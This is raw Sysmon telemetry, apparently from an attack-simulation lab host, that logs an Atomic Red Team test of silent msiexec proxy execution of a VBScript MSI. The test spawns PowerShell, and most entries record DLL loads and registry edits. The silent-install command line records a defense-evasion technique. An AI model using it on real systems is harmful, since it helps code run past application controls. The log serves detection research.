CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694068Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694067Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694066Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694065Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694064Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694063Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694062Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694061Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694060Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694059Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694058Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694057Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694056Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694055Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694054Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694053Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694052Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694051Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694050Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694049Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694048Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694047Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694046Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694045Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694044Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694043Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694041Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694040Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.647{7CF983DC-9825-62AC-286B-000000006202}42283916C:\Windows\SYSTEM32\cmd.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\SYSTEM32\cmd.exe+f1e1|C:\Windows\SYSTEM32\cmd.exe+11a37|C:\Windows\SYSTEM32\cmd.exe+cb0d|C:\Windows\SYSTEM32\cmd.exe+c295|C:\Windows\SYSTEM32\cmd.exe+f916|C:\Windows\SYSTEM32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694039Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.659{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9825-62AC-286B-000000006202}4228C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002694004Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.638{7CF983DC-9825-62AC-296B-000000006202}4496C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9825-62AC-286B-000000006202}4228C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002693997Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.607{7CF983DC-9825-62AC-286B-000000006202}4228C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002693976Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.553{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002693975Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.553{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693974Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693973Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002693972Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002693971Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002693970Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693969Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693968Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693967Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693966Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693965Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002693964Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.553{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5143.msiMD5=47B535A9C2480FAD4788850FF2AE76D2,SHA256=3293A5CB821F391F6B0E1328D23B15047C4A43EFBFEEF5FEA057DBACDBD68D85falsetrue 734700x80000000000000002693586Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693563Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.272{7CF983DC-9825-62AC-256B-000000006202}47641480C:\Windows\System32\MsiExec.exe{7CF983DC-9825-62AC-266B-000000006202}2552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002693562Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.274{7CF983DC-9825-62AC-266B-000000006202}2552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 033E360301F8EF9767AF61FB660F8D7FWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002693561Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.272{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002693560Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.272{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002693559Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.272{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002693558Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.272{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 